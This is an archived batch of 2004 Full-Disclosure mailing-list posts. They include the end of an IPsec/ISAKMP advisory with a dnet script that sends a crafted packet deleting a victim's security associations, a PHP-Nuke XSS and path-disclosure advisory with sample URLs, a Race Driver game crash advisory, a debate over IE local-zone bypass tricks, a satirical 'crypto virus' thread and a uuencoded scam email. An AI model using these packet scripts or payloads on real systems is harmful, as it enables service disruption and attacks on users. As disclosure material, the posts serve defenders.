dnet hex \
  $cky_i \
  "\x00\x00\x00\x00\x00\x00\x00\x00" \
  "\x01\x10\x02\x00" \
  "\x00\x00\x00\x00" \
  "\x00\x00\x00\x58" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
  "\x00\x00\x00\x20" \
  "\x01\x01\x00\x01" \
  "\x00\x00\x00\x18" \
  "\x00\x01\x00\x00" \
  "\x80\x01\x00\x05" \
  "\x80\x02\x00\x02" \
  "\x80\x03\x00\x01" \
  "\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

  He fires up his script with appropriate parameters:

attacker# ./during_these_hostile_and_trying_times_and_what-not \
> sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneous:

sg-a# cat /kern/ipsec  
Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Nils Ketelsen]

On Tue, Jun 08, 2004 at 11:46:22AM -0500, Billy B. Bilano wrote:

> Sorry to say but it is not! I checked my incoming traffic again this morning
> and the attack on port 443 is still coming in full steam ahead! I don't know
> what's going on, but I am about to block that port on my firewall. Some
> nitwit (probably the idiot that was here before I became IT Director)
> somehow, for some reason, deliberately opened port 443 on the firewalls!

Close them. If you do not know what you need them for it might be the best
alternative.

> I am beginning to think that this is the first wave of the new coming global
> crypto-storm!

It is not that new, as a matter of fact. It is specified and documented for
10 years. It is SSL and it is supposed to be in place on many webservers.

Could we now please stop this stupid discussion, as it is absolutely not
worth eating up more time.


Thanks,
  Nils
-- 
Gibt's eigentlich auch schon emacs-Einbauküchen?

[EMAIL PROTECTED] (Nico Hoffmann)
zum Thema "vi-Tassen" in de.alt.arnooo]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Billy B. Bilano]

Hi Harlan! Thanks for your reply... hard to make heads or tails of what you
are saying though...

> Wouldn't it then be, by definition, a worm?

A worm or whatever you want to call it, that's cool. I just thought "virus"
sounds more alarming than worm! Everybody has had a worm or two, but a virus
is a tough cookie to crack!


> What information do you have to support this
> assumption?

Because it is attacking our web servers and it seems to have somehow gotten
installed on our web servers at the same time! I don't know how it got in,
but there is traffic going in and out of the servers on port 443 with an
encrypted payload! I don't know what is answering on port 443 on the web
servers, but for the life of me I can't find anything on them that looks
like it's a virus or a worm or a troglodite or anything!


> If this worm runs over SSL, as you say, then wouldn't
> you expect it to be encrypted?

Whatever ssl is, I don't know but it's using the so-called "ssl" port on the
web servers. I don't think it has anything to do with whatever ssl was back
in the old days of UNIX. It has a lower port number and that means it's an
older port! Probably from the 1970s!

Besides, why should I see any encrypted traffic on any port other than SSH?
I don't expect to see encryption on anything other than the SSH port 22
(which is a very old port).


> Regardless, there isn't any information in your post
> that clearly shows that this worm infects both Windows
> and Unix hosts.  In fact, one thing that does seem
> clear in your post is that you haven't collected any
> information from the "infected" hosts, but rather all
> you've got so far is network traffic via
> Ethereal...and to be honest, any worm running over SSL
> is going to be encrypted...

But this port 443 is not SSH! Why should it be encrypted? And what is this
"ssl" thing? I've been in IT for many years and I am now IT Director here at
the bank... I would think that I would know what "ssl" would be. I don't
think this worm has anything to do with whatever "ssl" is. Does anybody even
still use ssl? That's probably why the hackers chose it.


P.S. Check out my bloglog, Harlan!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[Jelmer]

> Can you proof me wrong?

I'll give it a shot

Before sp1 you could simply load any local file into an iframe, then they
realized well this is a security risk and they removed that ability in sp1
There have been 5 issues found that circumvented this restriction (that I
know of)


1) Thor took a look at a prerelease SP1 and added his 2 cents

http://seclists.org/lists/bugtraq/2002/Sep/0090.html

One of the few times he was actually helpfull
It turned out that using a serverside redirect you could still access local
resources, This is very much like what you are seeing here
Microsoft then proceeded to correct this

2) Another issue popped up, this time by mindwarper

Load a file that does a redirect to a local resource in an iframe, reload
refresh the contents and presto your in, it renders it

3) the shell protocol allows access to local resources like this  Eiji James Yoshida found this

http://www.geocities.co.jp/SiliconValley/1667/advisory08e.html

4) Arman Nayyeri found that showHelp let you access local chm files

http://www.security-corporation.com/articles-20040103-003.html


5) what I describe in the analysis, it's exactly the same as 1)  with one
distinction it uses an URL: prefix, IE doesn't see an file , ms-its, res etc
protocol so assumes it's ok , and lets it pass  


It's nothing like the refresh issue 2) (since there is no refresh)

Nor is it anything that roozbeh describes, nice it uses scripting this is a
serverside redirct

However no it's not strange that you have this feeling of déjà vu, it's a
variation of Thor's find. Microsoft patched it, overlooked this variation,
the author of this Trojan caught it effectively making it a new thing (tm) 



Note I got this wrong in the analysis and will probably update it
As for Roozbeh Afrasiabi's posts just ignore them... really just do it


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of BoneMachine
Sent: dinsdag 8 juni 2004 15:29
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of
arbitrary code (An analysis of the 180 Solutions Trojan)

Hi Jelmer, 
I've read your analysis of the trojan of 180  solutions and noticed the
statement that this issue uses two zero day exploits.
I'm trying to monitor and register IE vulnerabilities and have a strong
feeling I've seen the Location header execution before. 
Just to be sure, are you aware that:
- Liu Die Yu discards the local protocol issue as a refresh issue:
http://www.safecenter.net/UMBRELLAWEBV4/IredirNrefresh/IredirNrefresh-MyPage
.htm
- Roozbeh Afrasiabi created a paper about vulnerabilities in IE. One of the
vulnerabilities uses the following statement in the example code :
target.location="ms-its:\\ntshared.chm::/copyright.htm";
The posting to bugtraq can be found at :
http://archives.neohapsis.com/archives/bugtraq/2004-05/0109.html

To me these issues and your URL: issue seem the same and afaik no patches
for these issues had been provided. 

Can you proof me wrong?




vriendelijke groet
Bone Machine



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[[EMAIL PROTECTED]]

Who exactly are you? 

You come barreling into FD several months ago, long after it was 
created. Pissing in your pants to have found a unmoderated new 
mailing list. You run around on a spree posting every piece 
drivel at every possible opportunity. You then latch onto 
bugtraq riding the coat-tails of other peoples message in order 
to get yours approved. Now I see you have insinuated yourself 
into the Risks Digest 23.41 with perhaps a record 3 messages in 
one go.

Somebody spends there time and effort analysing a zero day, you 
then have the fucking nerve to complain about that:



and then you further demonstrate your cockeyed thought process 
by thinking Jelmer has given you a moments thought and has 
also 'dragged personal issues and flames into "the thread"'



"the thread" being his analysis of the zero day that you stuck 
your fat face into in the first place.

Like I said go start yet 'another' mailing list if you are so 
desparate for attention. You can be the moderator, the only 
poster, the king of the hill, everything you want to be. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Harlan Carvey]

Bill,

>From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that
> port as well and, presumably, awaits for commands
> from some series of
> servers elsewhere. Perhaps taking orders? 

What information do you have to support this
assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks
> like -- you heard it
> here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't
you expect it to be encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly
> fearing? 

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal
of information in your post that supports any of your
assertions/assumptions.  If this thing is spreading
the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post
that clearly shows that this worm infects both Windows
and Unix hosts.  In fact, one thing that does seem
clear in your post is that you haven't collected any
information from the "infected" hosts, but rather all
you've got so far is network traffic via
Ethereal...and to be honest, any worm running over SSL
is going to be encrypted...
 
> At any rate, this is your heads up, folks! You heard
> it here first! Be on
> the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Billy B. Bilano]

Steve,

Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!

I am beginning to think that this is the first wave of the new coming global
crypto-storm!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Please tell me this is just a really bad joke?
>
> -Original Message-
> From: Billy B. Bilano
> [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 10:53 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Salutations, amigos!
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered !

[Billy B. Bilano]

Mike,

I don't see anything funny about it! We could be looking at a virus the
likes of which we have never, ever seen before!

Hackers and scripter kiddies are getting crazier by the day! It was only a
matter of time until one of them unleashed the powers of the crypto!



Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Michael R."
To: "'Billy B. Bilano'" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:42 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered !


> You are truly hilarious.
>
> I am still trying to stand up after reading this!
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Billy B. Bilano]

Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)

I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Various crashs and fun in Race Driver 1.20

[Luigi Auriemma]

###

 Luigi Auriemma

Application:  http://www.codemasters.com/tocaracedriver/
Versions: <= 1.20
Platforms:Windows
Bugs: various crashs and spoofed messages
Risk: medium
Exploitation: remote, versus server and attached clients
Date: 08 June 2004
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:http://aluigi.altervista.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Race Driver is a great and funny driving game developed by Codemasters
and released in March 2003.
Actually this game is no longer supported due to the release of Race
Driver 2 in April 2004.


###

===
2) Bugs
===


Important note: the attacker MUST have access to the server (so if the
  server is protected by password the attacker must know it) and the
  bugs can be exploited ONLY when the server is in the lobby stage
  (openplaying) that is the only moment when players can join.

--
A] Multi crash
--

If a server receives a message packet with a length identifier of 0
it will crash immediately after the access to a NULL pointer.
All the attached clients will crash too.


---
B] Server disconnection
---

A malformed packet can stop the remote match in a couple of seconds.


---
C] Spoofed messages
---

The communication protocol used by the game permits to send messages
to the server without to be really in the match and with the other
players in the server as their sources.
In fact each player is identified by an ID (for example the admin as
ever ID 0) and this value can be customized in the message packet.

Very boring is the messages flooding attack during the race... moreover
for the server's bandwidth.


###

===
3) The Code
===


http://aluigi.altervista.org/poc/rdboom.zip


###

==
4) Fix
==


No fix.
Unfortunately the game is no longer supported.


###


--- 
Luigi Auriemma
http://aluigi.altervista.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[madsaxon]

At 10:53 AM 6/8/2004 -0500, Billy B. Bilano wrote:
Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!
Anyone else notice that it's getting harder and harder to tell
F-D from The Onion?
;-)
m5x
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Yet another Bank-e-mail-you-name-it scam...

[Chontzopoulos Dimitris]

FYI,


Cheers to all


begin 666 ATT00577.eml
M1G)O;3H@(D-I=&EB86YK(B \=7-EF] 86)C+F=R/@T*4W5B:[EMAIL PROTECTED]:6)A;FL@
M:6YF;W)M2!-:6-R;[EMAIL PROTECTED],
M12!6-BXP,"XR.# P+C$T,#D-"[EMAIL PROTECTED];F=U86=E.B!E;BUU2U+97DZ(&ED,0T*6"U-;WII;&QA+41R
M869T+4EN9F\Z(&EN=&5R;F%L+V1R869T.R!V8V%R9#TP.R!R96-E:7!T/3 [
M('5U96YC;V1E/3 -"@T*(#QH='1P+R8E4CDV)$ X5EU//$8Q4R\R*% K(B!0*R(@5BPS
M($P-"DTH(RA7+3(H0#Q604$\)C1=*$55H-"DU/7B)0/B103D9633!*54E-4BE;/UPK
M05PS2E\[6U2SP-"DU2,2PE35 L43A165 D($5(+38P-2(@
M,3TV0E<[EMAIL PROTECTED](2 ]+$52*& U72(A(B E)[EMAIL PROTECTED]"DTZ0R5&
M52I)2%1:2D4I-"8A-BI64%!'22U>2SI)*2I!2UQ>2SU"7D,A5$ L123T8T
M.R-30SQ>4B)8239")[EMAIL PROTECTED],TXE7"U+)40T3C\W0TM(/"$S($
M7SA%05H]/[EMAIL PROTECTED];7DU/5R$R0T -"DTO0$[EMAIL PROTECTED]<[2EHZ/D!!0DM*2BHR-CI.2DE**CI*
M6DI*3$U.2TI*6R,F*DY.3$TM.4H-"DU:6E9864I+2TM+4D9*3D9/4" X2ULK
M(R0E1D],3#Q 1DI>4E)3(SM+6RLO,#%"3TU-+3$V.EY77TT]048-"DU*7E96
M5R<[2UL[/T!!0D].3BXR-CI>6EE:*CI+6TM+3$U.3TY.7R,F*EY>7%TM.4M;
M6U=864I/3T]/4U8-"DU:7EY?8& \7"HP8"0E4%(@)5 ]-T0O(#8A+4Y07"!<
M)B]?4U B(2PK0R9')24S+C$L,%P[2%LB45$D)2P-"DU')R,TPC*"[EMAIL PROTECTED]"U23$Q 3$!=7EE34U-4
M+T,-"DU/*R,A,4(]7#PM)2154%%35%1/+TLJ1S,Q6TU,73Q8/EI>4U-50UU+
M0S<[EMAIL PROTECTED] ]/4!25EY3558F-%\-"DTG/SLK-$,M.DQ<040[7E=4539"(R,W
M*SP\,DX]33T]4DE<5U/CU=,"-75%=?7C8N*%1;657EXZ+E
M55$F4%)3.B,F+U8F5C,W0D Z5#%$*"\Z.# D-C])1%5,0U8^.E%'1"-21%=.
M02<-"DU/4U7%LI5"X],24G,RY"45142CE%*E=*1U\-"DT[65LJ4%%,+U,P1S%"
M,DM/0S$I13E33%4V32HP444F-TX\+D(P13
M.D/[EMAIL PROTECTED]
M-3XJ,4,54D+4A=*C15/RQ823)-2"A.0UDD2E1/74$V(S<-"DT\/3U,
M*R);[EMAIL PROTECTED])E8A2EU:+DXH)$=,/U!<6%4F*% M,"592S9=14=@
M(R-#0R!&5RPE/%(-"DU*+D%5639#/S)%3$!;63
M-U5$0S)?+CX^3C)27UI4/5Q>5BQ)4S=.63.D5!2$180"@_0S\L2#<\/UPW3B)E P*%A61BU&5E\-"DU.(#,T1B9+.38D5%(E
M(RLZ/B0[/"(F52Y<*%=!2B9#*%E&5E=51"4B)3108#(F-C4N)R95)B9!.E$X
M0U$-"DU51R(Y/BA"43Q50BQ.)$Q"*5DA0D%%/EM5*%]<7BA&4"U51DE>)"4J
M25=;-S(G*%0I1TT@/[EMAIL PROTECTED](G12,-"DT]5RDL45,M528G1TQ-.#HA628M3UU8
M.DA9.2%2*5= *2XE5D)16"58+3A 1%(E/31<5T<\15=).U%8,CX-"DTM62M 
M43= 4TXD)R8Q62T^54=&2%U5*2$Z)SA;)CDO5RE6(4!16"I#(3A(3RHS6$LZ
M."TN.BDK(C%762H-"DTA23(@335T$L14 Q7T ^-5XO4$8J6D$Z,#A&139.)44]1T! 64$S.5$-"DU"03(O
M(SU&+20E,CA9,B(]6"5"+CQ4(CU86"(]6R9"/3P\(BQ$/B8]/2 B/E2DY9*DI.62Y*4EL^2E!%
M0DI11C9*44=&[EMAIL PROTECTED]"DTR2E[EMAIL PROTECTED]"5UI*5%$-"DTR6E-56DLH4%9;(UXZ
M2RQ,(ELH549:6%(^6R=3+DI9(EI;(%LN6S,_0DI?35)++EU&2R$C0ELP/5):
M7$L-"DU"6RTP0ELH)S);*U\Z)B92)%-.34==2E-"1DI//S=*23193D\X*TY0
M2%!*2RM33E%;5$I+(3-.3S9=3E0-"DTR.4Y123U*3# T3E4V*$Y*(4E.5E0S
[EMAIL PROTECTED]/2=.4#$D3E0]04Y&[EMAIL PROTECTED],T9*5S1;3#L-"DT]/DY2
M)"=.4C<]3DDL4DY4,T5.24\G2E8D24I8+SQ.5S8Z3DU#54Y4(S=.5C0U3ED_
M*$Y5/[EMAIL PROTECTED],-"DTU+$Y9059.45\^2E='*DY3259*5#,B3E%"44Y25$TF
M6$M.3E%$)TY-*#U.4DY03EPD/DY71D=.4DLJ3E(-"DT[3DY12SE.53Q43EI2
M64Y32E%.6DDN3E-/7TY62#].4DTV3EU4/4Y14T=.6D8D3E%"6DP[3D).3D<[
M3E0-"DU21$Y=6U=*3DQ82D%-)TI=(U5.4T\A2D=2*4Y<.B-.7%-23EU!7$Y4
M5CE.15(R2E
M.3Y=,C=$2#XX,[EMAIL PROTECTED]<7E4O+%])7RE:6$545S8U63=.159$.BXI
M04L-"DU2-C5,.5A(,58\631>/%LT45DU43$U14)16"M+1CTB2%5()DT_+2 F
M1SQ5*#E'2B(N*# C.BE%,38U-$\-"DU*+%Y1/R0D0%5B<[35Q7.DA,5SL-"DU.-5<\*2$C.DU%5SQ065<\4E=7/$LU
M5SM.2%<\*$(C/4H]5SI235<\5%A7/54D5SU-.5<]5TY7.U [5",-"DU11E0B
M2457/DTH5SI:*E<\5S!7/5I95SY71%<^65%7/UPO5SU<35<^4E57/UU/5SY:
M.%<]6#Y4(U];+"T-"DU7+TD]5UY:/5=0,%Y8("T^5S D7E=<6CU8(#62XO75DL7ST-"DU7/[EMAIL PROTECTED] [EMAIL PROTECTED],45DT
M(#!91BI.)%U1/5E%)5Y91E,[EMAIL PROTECTED]<@8",Q(%E35# -"DU95T%.
M65(V,%E2+R!94BM 65=-/EE7*SY94CI 659?3F!724Y:)%I 6B$W(%HH)UY:
[EMAIL PROTECTED]"DU96%L^6BDE+F!)/5Y:(TY 6BE.+B$H4UY:-SM.65E,
M7EHI*DY:/UXV/T J/B-.1CQ?0"Y%.TY*-$=.0CD-"DTS3D8X7TX^5$-.1B-#
M3CU5-TY-7U-.3B5;3DY75TY.1U].3DI73D)95TX^1CM.4E(O3DLF/TXZ-RM.
M3RT-"DTW3D\P)TY7+#-.5S4K3DI>*TY3)3=.1C4O3E),0TY*7#=.5S(G3D90
[EMAIL PROTECTED];([EMAIL PROTECTED]"DTG3DA(."Y;(2=.6SHC3ELD6TY;)"].
M6TI73C=(5TY;2E=.5UHG3R-&7TY//#=.4U4O3E]81TY>+T=/(U8-"DTK3EXY
M/TY8*U->6U0C3R-"-T\G53].7EI'3E=+2TY'/4=./RD_3R6#8-"DU+7R<_2T\F2UM.5$XG7EQ#*U\D2R]>1",[EMAIL PROTECTED]
M6%]/*$8K7CQ57UY'*DM/[EMAIL PROTECTED]:(UY#5C=.0RD-"[EMAIL PROTECTED]
M7DDG)U\T.RU (U191"-52SU;3RTS(TTD1B=51R%;2Chttp://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Multiple vulnerabilities PHP-Nuke

[Jeruvy]

This does not apply to any site that has applied the security fixes
available for many, many months.  This is only affecting phpnuke.org
distro's, not any 'modified' or 'secured' distro, like betaNC, CPG-NUKE,
and others...

No additional patches dealing with these specifics below applied to
php-nuke 7.0 only the security patches.

A. Generates a proper ACCESS DENIED page, no PATH DISCLOSURE.  
-
RESULT:

"You are trying to access a restricted area.

We are Sorry, but this section of our site is for Registered Users Only.
You can register for free by clicking here, then you can
access this section without restrictions. Thanks."

B. No CSS exploit.  Same result as above.  Below example was sanitized
prior to GET:


RESULT:

modules.php?name=Reviews&rop=postcomment&id='%3Ch1%3EDarkBicho%3C/h1&tit
le=a
modules.php?name=Reviews&rop=postcomment&id='&title=%3Ch1%3EDarkBicho%3C
/h1%3E


So as long as you've addressed the age-old bugs that still haven't been
fixed in the basic PHP-Nuke distro's then you may be vulnerable.
However these methods have long been squashed in patches available, and
do not affect newer, secure distro's such as betaNC or CPG-Nuke.

Again, I added no new patches to test these potentials in the last 30
days.  And they simply are not a factor.

Sincerely,

J.
j e r u v y a t s h a w d o t c a 


-Original Message Below-
From: Dark Bicho [mailto:[EMAIL PROTECTED] 
Sent: Monday, June 07, 2004 3:31 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Multiple vulnerabilities PHP-Nuke


original advisory : http://bichosoft.webcindario.com/advisory-05.txt


-

:.: Multiple vulnerabilities PHP-Nuke :.:

  PROGRAM: PHP-Nuke
  HOMEPAGE: http://phpnuke.org/
  VERSION: 6.x, 7.2, 7.3
  BUG: Multiple vulnerabilities
  DATE:  14/05/2004
  AUTHOR: DarkBicho
  web: http://www.darkbicho.tk
  team: Security Wari Proyects 
  Email: [EMAIL PROTECTED]


-


1.- Affected software description:
-

Php-Nuke is a popular content management system, written in php by
Francisco Burzi.

2.- Vulnerabilities:
---

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive 
information.

:.: Examples:


http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='Dark
Bicho

Warning: date(): Windows does not support dates prior to midnight 
(00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on

line 527

B. Cross-Site Scripting aka XSS:

:.: id :

* 
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit
le=a

http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='
DarkBichohttp://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit
le=DarkBicho


3.- SOLUTION:
 
Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
Check the PHP-NUKE website for updates and official release details.


4.- Greetings:
-

greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"


5.- Contact
---

WEB: http://www.darkbicho.tk
EMAIL: [EMAIL PROTECTED]


-
___  
   /   _/  \/  \__   \
   \_  \\   \/\/   /| ___/
  /\\/ ||
 /___  / \__/\  /  ||
 \/   \/

Security Wari Projects
  (c) 2002 - 2004
Made in Peru

[   EOF
]--

_
Consigue aquí las mejores y mas recientes ofertas de trabajo en América 
Latina y USA: http://latam.msn.com/empleos/




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] [CYSA-0329] Password recovery vulnerability in FoolProof Security 3.9.x for Windows 95/9

[Michael Kurz]

[EMAIL PROTECTED] schrieb:
 hex_temp[2],/* Temporary storage for hexadecimal conversion */
   
must be hex_temp[3]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[Gadi Evron]

Michael Evanchik wrote:
Although this ms-its exploit has been around ,the true author of finding this is an 
UNKNOWN author.  I remember when it was _reported_ by Thor but he did not take credit. 
 As for it being 0-day.  It sure is.  None of microsofts's patches stop it nor did 
Norton AntiVirus Corp.  I have no idea who you are Gadi to give such comments like 
that.
Michael Evanchik
I am the guy who gave what information he has, and asked for 
clarifications on the 0-day issue.

Where Jelmer and I disagree is on dragging  personal issues and flames 
into the thread.

Gadi.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[Jelmer]

This new exploit is unrelated to the
ms-its exploit 

 

I could just as easily have done 

 

response.setHeader("Location",
"URL:res://shdoclc.dll/HTTP_501.htm");

 

and there would be no ms-its protocol
handler used in it, it’s just a local resource it loads , it could be a htm
file a resource file, an ms-its file whatever

 

 

-Original Message-
From: Michael Evanchik
[mailto:[EMAIL PROTECTED] 
Sent: dinsdag 8 juni 2004 15:29
To: Gadi Evron; Jelmer
Cc: [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Re:
Internet explorer 6 execution of arbitrary code (An analysis of the 180
Solutions Trojan)

 





Although this ms-its exploit has
been around ,the true author of finding this is an UNKNOWN author.  I
remember when it was _reported_ by Thor but he did not take credit.  As
for it being 0-day.  It sure is.  None of microsofts's patches stop
it nor did Norton AntiVirus Corp.  I have no idea who you are Gadi to give
such comments like that.





 





Michael Evanchik





 





www.MichaelEvanchik.com 









- Original Message - 





From: Gadi Evron 





To: Jelmer 





Cc: [EMAIL PROTECTED]
; [EMAIL PROTECTED] ;
[EMAIL PROTECTED]






Sent: Monday,
June 07, 2004 4:47 PM





Subject: [Full-Disclosure]
Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180
Solutions Trojan)





 



Comments inline.

Jelmer wrote:

> Just when I though it was save to once more use internet explorer I
received
> an email bringing my attention to this webpage
> http://216.130.188.219/ei2/installer.htm  
that according to him used an
> exploit that affected fully patched internet explorer 6 browsers. Being
> rather skeptical I carelessly clicked on the link only to witness how it
> automatically installed addware on my pc!!!

So, you just clicked on the link which was reported as unsafe, did you? :)

Those protocol handlers always seem to cause problems and it's not just 
on Windows, Apple has had just as many problems in dealing with these 
for OS X. If it's not a lack of input validation then it is a lack of 
zone restrictions, perhaps the entire concept of higher privileged zones 
of any kind should be abandoned.

Are these really new vulnerabilities or just variants of old? The 
"Location: URL:" proxy really just looks like the "Location:
File:" 
proxy that Liu Die Yu reported and the object caching stuff really just 
looks like a variation of the advisories from GreyMagic back in 2002 
with the showModalDialog caching and _javascript_: injection. Other than 
those 2, the only real vulnerability on the page is the Ibiza chm stuff 
which still works on plenty of fully patched machines.

> Now there had been reports about 0day exploits making rounds for quite
some
> time like for instance this post
>  
> http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0


Why is this a 0-day? Are you trying to start a holy war here? Please 
explain why this is a 0-day if you make such claims.

> However I hadn't seen any evidence to support this up until now
> Thor Larholm as usual added to the confusion by deliberately spreading
> disinformation as seen in this post
>  
> http://seclists.org/lists/bugtraq/2004/May/0153.html

Thor? Spreading disinformation?

> Attributing it to and I quote "just one of the remaining IE
vulnerabilities
> that are not yet patched"

That sounds about right.

> I’ve attempted to write up an analysis that will show that there are
at
